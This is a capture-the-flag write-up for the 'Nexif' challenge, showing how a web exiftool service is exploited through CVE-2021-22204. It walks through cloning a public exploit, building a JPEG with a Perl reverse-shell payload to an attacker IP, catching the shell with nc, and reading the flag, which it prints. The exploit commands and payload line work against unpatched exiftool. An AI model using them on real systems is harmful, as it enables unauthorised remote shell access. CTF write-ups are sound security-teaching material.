Nexif (Smart City, 200p)

Test the security of this online Exiftool service.

Can you find the vulnerability and exploit it?
You can find the flag from the home folder.
http://envXXX.target02:8082

---

solution

Website has a simple file upload form. By description, it will run exiftool on uploaded file.

There is a well known exploit for exiftool, therefore download one of existing CVE-2021-22204 exploit.

# git clone --depth=1 https://github.com/AssassinUKG/CVE-2021-22204 && cd CVE-2021-22204
Cloning into 'CVE-2021-22204'...
remote: Enumerating objects: 4, done.
remote: Counting objects: 100% (4/4), done.
remote: Compressing objects: 100% (4/4), done.
remote: Total 4 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (4/4), done.

Create reverse shell payload.

# convert -size 1:1 canvas:white pwn.jpg
# bash CVE-2021-22204.sh "reverseme 10.85.XX.Y 9000" pwn.jpg
   _____   _____   ___ __ ___ _    ___ ___ ___ __  _ _
  / __\ \ / / __|_|_  )  \_  ) |__|_  )_  )_  )  \| | |
 | (__ \ V /| _|___/ / () / /| |___/ / / / / / () |_  _|
  \___| \_/ |___| /___\__/___|_|  /___/___/___\__/  |_|

Creating payload
IP: 10.85.XX.Y
PORT: 9000
(metadata "\c${use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in(9000,inet_aton('10.85.XX.Y')))){open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');};};};")

    1 image files updated 

Listen for reverse shell, upload pwn.jpg, get the shell and retrieve the flag.

# nc -vlnp 9000
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::9000
Ncat: Listening on 0.0.0.0:9000
Ncat: Connection from 10.92.XX.Y.
Ncat: Connection from 10.92.XX.Y:36134.
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1000(user1337) gid=1000(user1337) groups=1000(user1337)
$ find /home/user1337
/home/user1337
/home/user1337/.bash_logout
/home/user1337/.bashrc
/home/user1337/.profile
/home/user1337/flag.txt
$ cat /home/user1337/flag.txt
ctftech{ff379755-33f3}

Flag is ctftech{ff379755-33f3}.